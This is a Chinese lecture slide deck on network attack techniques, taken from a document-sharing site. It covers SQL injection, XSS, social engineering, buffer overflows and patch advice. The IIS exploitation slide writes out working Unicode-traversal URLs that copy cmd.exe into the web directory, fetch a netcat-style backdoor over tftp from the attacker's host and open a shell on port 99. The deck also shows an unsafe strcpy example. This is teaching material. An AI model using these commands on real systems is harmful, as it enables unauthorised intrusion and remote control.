第四章 网络安全攻击技术-2-高显嵩.pptVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
SQL Injection SQL注入原理 判断能否进行SQL注入 SQL 注入的一些特殊用法 SQL 注入的防范方法 SQL Injection 跨站脚本攻击(Cross Site Scripting,XSS)是当前Web应用中的一项非常严重的问题,攻击者利用应用程序对数据输入检验的脆弱性,通过人际工程、恶意代码等手段向用户代理,如浏览器中注入可执行代码,如Javascript,操纵用户代理执行恶意操作,以窃取用户敏感信息,安装恶意代码,进行电子钓鱼、拒绝服务攻击等,甚至利用用户代理攻击其它系统,包括内外网服务器和客户端; XSS可分为以下三种类型: 立即反射型(Immediate Reflection) 存储型(Stored) 基于DOM型(DOM-based) 社会工程学 社交工程是使用计谋和假情报去获得密码和其他敏感信息,研究一个站点的策略其中之一就是尽可能多的了解属于这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。 入侵攻击的步骤(入侵攻击五部曲) 入侵五步曲之三实施入侵 * 解决方案: 该漏洞补丁随微软安全公告MS00-057一起发布 (/technet/security/bulletin/ms00-057.asp) 可以从如下地址下载补丁: IIS 4.0 /ntserver/nts/downloads/critical/q269862/default.asp IIS 5.0 /windows2000/downloads/critical/q269862/default.asp 漏洞利用: 为了方便输入,我们可以把cmd.exe改名为其他名字的文件,比如说cnf.exe http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cnf.exe 以后使用就可以直接 http://x.x.x.x/scripts/cnf.exe?/c+echo+HELLO+ c:\inetpub\wwwroot\default.htm 综合运用 本地建立tft pserver (1) http://x.x.x.x/scripts/cnf.exe?+/c+tftp+-i+ip+get+ncx99.exe http://x.x.x.x/scripts/ncx99.exe telnet ip 99 (2) http://x.x.x.x/scripts/cnf.exe?+/c+tftp+-i+ip+get+idq.dll Ispc.exe x.x.x.x/scripts/idq.dll 缓冲区溢出攻击 几十年来,缓冲区溢出一直引起许多严重的安全性问题。其中最著名的例子是:1988 年,因特网蠕虫程序在 finger 中利用缓冲区溢出感染了因特网中的数万台机器。但是,缓冲区溢出问题并非已成古老的历史,缓冲区溢出(又称堆栈溢出)攻击已成为最常用的黑客技术之一。据统计,通过缓冲区溢出进行的攻击占所有系统攻击总数的80%以上。 缓冲区溢出的原理 引起缓冲区溢出问题的根本原因是 C(与其后代 C++)本质就是不安全的,没有边界来检查数组和指针的引用,也就是开发人员必须检查边界(而这一行为往往会被忽视),否则会冒遇到问题的风险。标准 C 库中还存在许多非安全字符串操作,包括:strcat(),sprintf(),vsprintf(),gets(),scanf()以及在循环内的getc(),fgetc(),getchar()等。 缓冲区溢出的原理 example1.c void function(char *str) { char buffer[16]; strcpy(buffer,str); } 缓冲区溢出的副作用取决于 写入的数据中有多少超过缓冲区边界 当缓冲区已满并且溢出时,覆盖了哪些数据(如果有的话) 程序是否试图读取溢出期间被覆盖的数据 哪些数据最终替换被覆盖的内存 缓冲区溢出漏洞攻击方式 在程序的地址空间里安排适当的代码 将控制程序转移到攻击代码的形式 unction Pointers(函数指针) ctivation Records(激活记录) Longjmp buffers(长跳转缓冲区) 植入综合代码和流程控制 缓冲区溢出的防患 正确的编写代码 非执行的缓冲区 检查数组边界 程序指针完整性检查 微软 idq.dll 缓冲区溢出漏洞 作为安装过程的一部分,IIS 安装了几个 ISAPI 扩展 .

文档评论(0)

好文精选 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档